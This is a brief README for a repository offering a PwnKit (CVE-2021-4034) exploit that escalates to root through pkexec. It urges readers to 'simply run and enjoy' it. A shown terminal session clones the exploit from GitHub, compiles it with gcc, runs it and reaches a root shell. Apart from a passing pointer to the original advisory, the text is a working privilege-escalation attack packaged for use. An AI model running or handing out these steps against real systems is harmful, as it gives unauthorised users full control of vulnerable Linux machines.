
Exploit for CVE-2021-4034 (PwnKit) that escalates privileges to root via pkexec, providing a simple shell execution.
A day for the polkit privilege escalation exploit
Simply run and enjoy ./blasty for your root shell.
The original advisory from the real authors is -> here
If the exploit works, you will get a root shell immediately:
(user@tecnokarita)-[~/Descargas] $> git clone https://github.com/T3cnokarita/CVE-2021-4034.git
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> gcc -o blasty blasty-vs-pkexec.c
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> ./blasty
# whoami
root
# exit